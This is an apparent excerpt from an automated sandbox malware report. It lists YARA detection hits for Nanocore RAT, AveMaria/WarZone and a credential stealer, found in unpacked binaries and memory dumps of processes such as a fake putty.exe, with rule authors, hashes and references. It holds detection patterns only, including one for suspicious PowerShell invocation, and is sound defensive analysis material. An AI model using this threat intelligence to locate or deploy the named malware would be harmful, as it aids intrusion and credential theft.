        Source: 34.2.iBCrDCK.i.exe.252baa4.22.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.c60000.14.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c60000.14.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.3f0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.3f0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.5e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.5e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.bf0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.bf0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.c50000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c50000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.24cdfa0.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.24cdfa0.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.d74c9f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.d74c9f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.d70000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.d70000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000006.00000002.2096261364.00000000002C0000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.2094462607.0000000000160000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
        Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2355684386.0000000002502000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2360227304.0000000003777000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
